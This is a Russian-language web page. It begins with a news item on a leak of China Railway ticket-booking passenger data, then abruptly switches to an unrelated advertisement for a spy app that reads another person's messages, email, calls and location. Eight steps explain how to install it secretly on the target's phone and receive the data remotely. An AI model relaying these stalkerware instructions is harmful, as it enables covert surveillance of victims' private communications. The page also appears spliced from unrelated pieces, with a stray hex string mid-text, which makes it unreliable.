Взломан китайский сервис бронирования билетов

e93a8a0968e13f9f23dd15bdb1c7a1c4Как сообщает информационный портал ZDNet, в результате атакующих действий со стороны неизвестных хакеров пострадала огромная железнодорожная база, данные которой до сих пор находятся во Всемирной Паутине. Там есть информация об именах пассажира, о дате прибытия поезда, о  местах и номерах вагонов, о сумме покупки, порой встречаются адреса и домашние телефоны клиентов железнодорожной компании. Все сведения имеют отношения к China Railway, которая является одной из крупнейших на внутреннем китайском рынке перевозок.

Представители China Railway несколько раз подтверждали, что вины сотрудников в распространении таких данных нет. На сайте 12306.cn используется современная система шифрования данных, в то время как данные, которые были в общем доступе, почему-то не шифровались.

В результате анализа логов системы сайта оказалось, что на нём присутствовали неустановленные IP-адреса. По всей видимости, именно по ним работали взломщики. Второй версией является вина пользователей, которые могли случайно установить в браузеры плагины для заказа билетов, на деле оказавшиеся открытками с фишинговых сайтов. Произошло заражение компьютеров, и как следствие – утечка информации.

О каком-то материальном ущербе информации пока не поступало. Всем пострадавшим предлагается срочно переоформить билеты, сменить логины и пароли в личном кабинете на сайте железнодорожной компании. Руководство планирует опубликовать на ресурсе и советы по безопасности. Социальная инженерия продолжает оставаться наиболее эффективным путём для получения доступа к различной информации.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.